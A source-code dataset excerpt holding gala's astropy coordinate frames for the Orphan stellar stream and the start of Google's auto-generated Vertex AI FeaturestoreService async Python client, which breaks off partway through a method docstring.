blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
721
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 5
91
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 321
values | visit_date
timestamp[ns]date 2016-08-12 09:31:09
2023-09-06 10:45:07
| revision_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| github_id
int64 426
681M
| star_events_count
int64 101
243k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[ns]date 2012-06-28 18:51:49
2023-09-14 21:59:16
⌀ | gha_created_at
timestamp[ns]date 2008-02-11 22:55:26
2023-08-10 11:14:58
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 26
values | language
stringclasses 2
values | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 6
10.2M
| extension
stringclasses 115
values | filename
stringlengths 3
113
| content
stringlengths 6
10.2M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
79fed6cce67c505d0e54df01110e60a8ed3b5f41
|
8c0b804f1cc8cbf2f8788727df22a2cc149f7b5c
|
/gala/coordinates/orphan.py
|
6ebd08448b02b8f03869ef2572b9fa913b98355e
|
[
"MIT"
] |
permissive
|
adrn/gala
|
579cc5a4ecb22df118e1c8a2322a46e935825054
|
f62e1a6ae7a8466a4db5c8407471b524cf085637
|
refs/heads/main
| 2023-09-04T11:42:07.278388
| 2023-08-18T18:04:35
| 2023-08-18T18:04:35
| 17,577,779
| 115
| 89
|
MIT
| 2023-09-05T11:40:10
| 2014-03-10T00:56:18
|
Python
|
UTF-8
|
Python
| false
| false
| 6,642
|
py
|
orphan.py
|
""" Astropy coordinate class for the Orphan stream coordinate systems """
import astropy.coordinates as coord
import astropy.units as u
from astropy.coordinates import frame_transform_graph
from astropy.coordinates.matrix_utilities import rotation_matrix
import numpy as np
__all__ = ["OrphanNewberg10", "OrphanKoposov19"]
class OrphanNewberg10(coord.BaseCoordinateFrame):
"""
A Heliocentric spherical coordinate system defined by the orbit
of the Orphan stream, as described in
Newberg et al. 2010 (see: `<http://arxiv.org/abs/1001.0576>`_).
Note: to be consistent with other stream classes, we refer to the longitude
and latitude as ``phi1`` and ``phi2`` instead of ``Lambda`` and ``Beta``.
For more information about this class, see the Astropy documentation
on coordinate frames in :mod:`~astropy.coordinates`.
Parameters
----------
representation : :class:`~astropy.coordinates.BaseRepresentation` or None
A representation object or None to have no data (or use the other keywords)
phi1 : angle_like, optional, must be keyword
The longitude-like angle corresponding to Orphan's orbit.
phi2 : angle_like, optional, must be keyword
The latitude-like angle corresponding to Orphan's orbit.
distance : :class:`~astropy.units.Quantity`, optional, must be keyword
The Distance for this object along the line-of-sight.
pm_phi1_cosphi2 : :class:`~astropy.units.Quantity`, optional, must be keyword
The proper motion in the longitude-like direction corresponding to
the Orphan stream's orbit.
pm_phi2 : :class:`~astropy.units.Quantity`, optional, must be keyword
The proper motion in the latitude-like direction perpendicular to the
Orphan stream's orbit.
radial_velocity : :class:`~astropy.units.Quantity`, optional, must be keyword
The Distance for this object along the line-of-sight.
"""
default_representation = coord.SphericalRepresentation
default_differential = coord.SphericalCosLatDifferential
frame_specific_representation_info = {
coord.SphericalRepresentation: [
coord.RepresentationMapping("lon", "phi1"),
coord.RepresentationMapping("lat", "phi2"),
coord.RepresentationMapping("distance", "distance"),
]
}
_default_wrap_angle = 180 * u.deg
def __init__(self, *args, **kwargs):
wrap = kwargs.pop("wrap_longitude", True)
super().__init__(*args, **kwargs)
if wrap and isinstance(
self._data,
(coord.UnitSphericalRepresentation, coord.SphericalRepresentation),
):
self._data.lon.wrap_angle = self._default_wrap_angle
# TODO: remove this. This is a hack required as of astropy v3.1 in order
# to have the longitude components wrap at the desired angle
def represent_as(self, base, s="base", in_frame_units=False):
r = super().represent_as(base, s=s, in_frame_units=in_frame_units)
if hasattr(r, "lon"):
r.lon.wrap_angle = self._default_wrap_angle
return r
represent_as.__doc__ = coord.BaseCoordinateFrame.represent_as.__doc__
# Define the Euler angles
phi = 128.79 * u.degree
theta = 54.39 * u.degree
psi = 90.70 * u.degree
# Generate the rotation matrix using the x-convention (see Goldstein)
D = rotation_matrix(phi, "z")
C = rotation_matrix(theta, "x")
B = rotation_matrix(psi, "z")
R = B @ C @ D
@frame_transform_graph.transform(
coord.StaticMatrixTransform, coord.Galactic, OrphanNewberg10
)
def galactic_to_orp():
"""Compute the transformation from Galactic spherical to
heliocentric Orphan coordinates.
"""
return R
# Oph to Galactic coordinates
@frame_transform_graph.transform(
coord.StaticMatrixTransform, OrphanNewberg10, coord.Galactic
)
def orp_to_galactic():
"""Compute the transformation from heliocentric Orphan coordinates to
spherical Galactic.
"""
return galactic_to_orp().T
# ------------------------------------------------------------------------------
class OrphanKoposov19(coord.BaseCoordinateFrame):
"""A coordinate frame for the Orphan stream defined by Sergey Koposov.
Parameters
----------
phi1 : `~astropy.units.Quantity`
Longitude component.
phi2 : `~astropy.units.Quantity`
Latitude component.
distance : `~astropy.units.Quantity`
Distance.
pm_phi1_cosphi2 : `~astropy.units.Quantity`
Proper motion in longitude.
pm_phi2 : `~astropy.units.Quantity`
Proper motion in latitude.
radial_velocity : `~astropy.units.Quantity`
Line-of-sight or radial velocity.
"""
default_representation = coord.SphericalRepresentation
default_differential = coord.SphericalCosLatDifferential
frame_specific_representation_info = {
coord.SphericalRepresentation: [
coord.RepresentationMapping("lon", "phi1"),
coord.RepresentationMapping("lat", "phi2"),
coord.RepresentationMapping("distance", "distance"),
]
}
_default_wrap_angle = 180 * u.deg
def __init__(self, *args, **kwargs):
wrap = kwargs.pop("wrap_longitude", True)
super().__init__(*args, **kwargs)
if wrap and isinstance(
self._data,
(coord.UnitSphericalRepresentation, coord.SphericalRepresentation),
):
self._data.lon.wrap_angle = self._default_wrap_angle
# TODO: remove this. This is a hack required as of astropy v3.1 in order
# to have the longitude components wrap at the desired angle
def represent_as(self, base, s="base", in_frame_units=False):
r = super().represent_as(base, s=s, in_frame_units=in_frame_units)
if hasattr(r, "lon"):
r.lon.wrap_angle = self._default_wrap_angle
return r
represent_as.__doc__ = coord.BaseCoordinateFrame.represent_as.__doc__
@frame_transform_graph.transform(
coord.StaticMatrixTransform, coord.ICRS, OrphanKoposov19
)
def icrs_to_orp19():
"""Compute the transformation from ICRS to
heliocentric Orphan coordinates.
"""
R = np.array(
[
[-0.44761231, -0.08785756, -0.88990128],
[-0.84246097, 0.37511331, 0.38671632],
[0.29983786, 0.92280606, -0.2419219],
]
)
return R
# Oph to Galactic coordinates
@frame_transform_graph.transform(
coord.StaticMatrixTransform, OrphanKoposov19, coord.ICRS
)
def orp19_to_icrs():
"""Compute the transformation from heliocentric Orphan coordinates to
spherical ICRS.
"""
return icrs_to_orp19().T
|
d3e70ff11823f81108484cd15da679366ad62561
|
99dcb18a9e3ea367272f740b8cbf3c34285a0c08
|
/google/cloud/aiplatform_v1beta1/services/featurestore_service/async_client.py
|
aa6784e4904ecc37f4ee403d535b71c5411a4389
|
[
"Apache-2.0"
] |
permissive
|
googleapis/python-aiplatform
|
926a4873f35dbea15b2fd86c0e16b5e6556d803e
|
76b95b92c1d3b87c72d754d8c02b1bca652b9a27
|
refs/heads/main
| 2023-08-19T23:49:02.180075
| 2023-08-19T13:25:59
| 2023-08-19T13:27:27
| 298,017,988
| 418
| 240
|
Apache-2.0
| 2023-09-14T21:08:33
| 2020-09-23T15:43:39
|
Python
|
UTF-8
|
Python
| false
| false
| 158,903
|
py
|
async_client.py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import (
Dict,
Mapping,
MutableMapping,
MutableSequence,
Optional,
Sequence,
Tuple,
Type,
Union,
)
from google.cloud.aiplatform_v1beta1 import gapic_version as package_version
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation as gac_operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.aiplatform_v1beta1.services.featurestore_service import pagers
from google.cloud.aiplatform_v1beta1.types import encryption_spec
from google.cloud.aiplatform_v1beta1.types import entity_type
from google.cloud.aiplatform_v1beta1.types import entity_type as gca_entity_type
from google.cloud.aiplatform_v1beta1.types import feature
from google.cloud.aiplatform_v1beta1.types import feature as gca_feature
from google.cloud.aiplatform_v1beta1.types import feature_monitoring_stats
from google.cloud.aiplatform_v1beta1.types import featurestore
from google.cloud.aiplatform_v1beta1.types import featurestore as gca_featurestore
from google.cloud.aiplatform_v1beta1.types import featurestore_monitoring
from google.cloud.aiplatform_v1beta1.types import featurestore_service
from google.cloud.aiplatform_v1beta1.types import operation as gca_operation
from google.cloud.location import locations_pb2 # type: ignore
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.longrunning import operations_pb2
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from .transports.base import FeaturestoreServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import FeaturestoreServiceGrpcAsyncIOTransport
from .client import FeaturestoreServiceClient
class FeaturestoreServiceAsyncClient:
"""The service that handles CRUD and List for resources for
Featurestore.
"""
_client: FeaturestoreServiceClient
DEFAULT_ENDPOINT = FeaturestoreServiceClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = FeaturestoreServiceClient.DEFAULT_MTLS_ENDPOINT
entity_type_path = staticmethod(FeaturestoreServiceClient.entity_type_path)
parse_entity_type_path = staticmethod(
FeaturestoreServiceClient.parse_entity_type_path
)
feature_path = staticmethod(FeaturestoreServiceClient.feature_path)
parse_feature_path = staticmethod(FeaturestoreServiceClient.parse_feature_path)
featurestore_path = staticmethod(FeaturestoreServiceClient.featurestore_path)
parse_featurestore_path = staticmethod(
FeaturestoreServiceClient.parse_featurestore_path
)
common_billing_account_path = staticmethod(
FeaturestoreServiceClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
FeaturestoreServiceClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(FeaturestoreServiceClient.common_folder_path)
parse_common_folder_path = staticmethod(
FeaturestoreServiceClient.parse_common_folder_path
)
common_organization_path = staticmethod(
FeaturestoreServiceClient.common_organization_path
)
parse_common_organization_path = staticmethod(
FeaturestoreServiceClient.parse_common_organization_path
)
common_project_path = staticmethod(FeaturestoreServiceClient.common_project_path)
parse_common_project_path = staticmethod(
FeaturestoreServiceClient.parse_common_project_path
)
common_location_path = staticmethod(FeaturestoreServiceClient.common_location_path)
parse_common_location_path = staticmethod(
FeaturestoreServiceClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FeaturestoreServiceAsyncClient: The constructed client.
"""
return FeaturestoreServiceClient.from_service_account_info.__func__(FeaturestoreServiceAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FeaturestoreServiceAsyncClient: The constructed client.
"""
return FeaturestoreServiceClient.from_service_account_file.__func__(FeaturestoreServiceAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return FeaturestoreServiceClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
@property
def transport(self) -> FeaturestoreServiceTransport:
"""Returns the transport used by the client instance.
Returns:
FeaturestoreServiceTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(FeaturestoreServiceClient).get_transport_class,
type(FeaturestoreServiceClient),
)
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, FeaturestoreServiceTransport] = "grpc_asyncio",
client_options: Optional[ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the featurestore service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.FeaturestoreServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = FeaturestoreServiceClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def create_featurestore(
self,
request: Optional[
Union[featurestore_service.CreateFeaturestoreRequest, dict]
] = None,
*,
parent: Optional[str] = None,
featurestore: Optional[gca_featurestore.Featurestore] = None,
featurestore_id: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a new Featurestore in a given project and
location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_create_featurestore():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.CreateFeaturestoreRequest(
parent="parent_value",
featurestore_id="featurestore_id_value",
)
# Make the request
operation = client.create_featurestore(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.CreateFeaturestoreRequest, dict]]):
The request object. Request message for
[FeaturestoreService.CreateFeaturestore][google.cloud.aiplatform.v1beta1.FeaturestoreService.CreateFeaturestore].
parent (:class:`str`):
Required. The resource name of the Location to create
Featurestores. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
featurestore (:class:`google.cloud.aiplatform_v1beta1.types.Featurestore`):
Required. The Featurestore to create.
This corresponds to the ``featurestore`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
featurestore_id (:class:`str`):
Required. The ID to use for this Featurestore, which
will become the final component of the Featurestore's
resource name.
This value may be up to 60 characters, and valid
characters are ``[a-z0-9_]``. The first character cannot
be a number.
The value must be unique within the project and
location.
This corresponds to the ``featurestore_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.Featurestore` Vertex AI Feature Store provides a centralized repository for organizing,
storing, and serving ML features. The Featurestore is
a top-level container for your features and their
values.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, featurestore, featurestore_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.CreateFeaturestoreRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if featurestore is not None:
request.featurestore = featurestore
if featurestore_id is not None:
request.featurestore_id = featurestore_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_featurestore,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_featurestore.Featurestore,
metadata_type=featurestore_service.CreateFeaturestoreOperationMetadata,
)
# Done; return the response.
return response
async def get_featurestore(
self,
request: Optional[
Union[featurestore_service.GetFeaturestoreRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> featurestore.Featurestore:
r"""Gets details of a single Featurestore.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_get_featurestore():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.GetFeaturestoreRequest(
name="name_value",
)
# Make the request
response = await client.get_featurestore(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.GetFeaturestoreRequest, dict]]):
The request object. Request message for
[FeaturestoreService.GetFeaturestore][google.cloud.aiplatform.v1beta1.FeaturestoreService.GetFeaturestore].
name (:class:`str`):
Required. The name of the
Featurestore resource.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.types.Featurestore:
Vertex AI Feature Store provides a
centralized repository for organizing,
storing, and serving ML features. The
Featurestore is a top-level container
for your features and their values.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.GetFeaturestoreRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_featurestore,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_featurestores(
self,
request: Optional[
Union[featurestore_service.ListFeaturestoresRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListFeaturestoresAsyncPager:
r"""Lists Featurestores in a given project and location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_list_featurestores():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.ListFeaturestoresRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_featurestores(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.ListFeaturestoresRequest, dict]]):
The request object. Request message for
[FeaturestoreService.ListFeaturestores][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListFeaturestores].
parent (:class:`str`):
Required. The resource name of the Location to list
Featurestores. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.services.featurestore_service.pagers.ListFeaturestoresAsyncPager:
Response message for
[FeaturestoreService.ListFeaturestores][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListFeaturestores].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.ListFeaturestoresRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_featurestores,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListFeaturestoresAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def update_featurestore(
self,
request: Optional[
Union[featurestore_service.UpdateFeaturestoreRequest, dict]
] = None,
*,
featurestore: Optional[gca_featurestore.Featurestore] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Updates the parameters of a single Featurestore.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_update_featurestore():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.UpdateFeaturestoreRequest(
)
# Make the request
operation = client.update_featurestore(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.UpdateFeaturestoreRequest, dict]]):
The request object. Request message for
[FeaturestoreService.UpdateFeaturestore][google.cloud.aiplatform.v1beta1.FeaturestoreService.UpdateFeaturestore].
featurestore (:class:`google.cloud.aiplatform_v1beta1.types.Featurestore`):
Required. The Featurestore's ``name`` field is used to
identify the Featurestore to be updated. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}``
This corresponds to the ``featurestore`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Field mask is used to specify the fields to be
overwritten in the Featurestore resource by the update.
The fields specified in the update_mask are relative to
the resource, not the full request. A field will be
overwritten if it is in the mask. If the user does not
provide a mask then only the non-empty fields present in
the request will be overwritten. Set the update_mask to
``*`` to override all fields.
Updatable fields:
- ``labels``
- ``online_serving_config.fixed_node_count``
- ``online_serving_config.scaling``
- ``online_storage_ttl_days``
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.Featurestore` Vertex AI Feature Store provides a centralized repository for organizing,
storing, and serving ML features. The Featurestore is
a top-level container for your features and their
values.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([featurestore, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.UpdateFeaturestoreRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if featurestore is not None:
request.featurestore = featurestore
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_featurestore,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("featurestore.name", request.featurestore.name),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_featurestore.Featurestore,
metadata_type=featurestore_service.UpdateFeaturestoreOperationMetadata,
)
# Done; return the response.
return response
async def delete_featurestore(
self,
request: Optional[
Union[featurestore_service.DeleteFeaturestoreRequest, dict]
] = None,
*,
name: Optional[str] = None,
force: Optional[bool] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Deletes a single Featurestore. The Featurestore must not contain
any EntityTypes or ``force`` must be set to true for the request
to succeed.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_delete_featurestore():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.DeleteFeaturestoreRequest(
name="name_value",
)
# Make the request
operation = client.delete_featurestore(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.DeleteFeaturestoreRequest, dict]]):
The request object. Request message for
[FeaturestoreService.DeleteFeaturestore][google.cloud.aiplatform.v1beta1.FeaturestoreService.DeleteFeaturestore].
name (:class:`str`):
Required. The name of the Featurestore to be deleted.
Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
force (:class:`bool`):
If set to true, any EntityTypes and
Features for this Featurestore will also
be deleted. (Otherwise, the request will
only work if the Featurestore has no
EntityTypes.)
This corresponds to the ``force`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
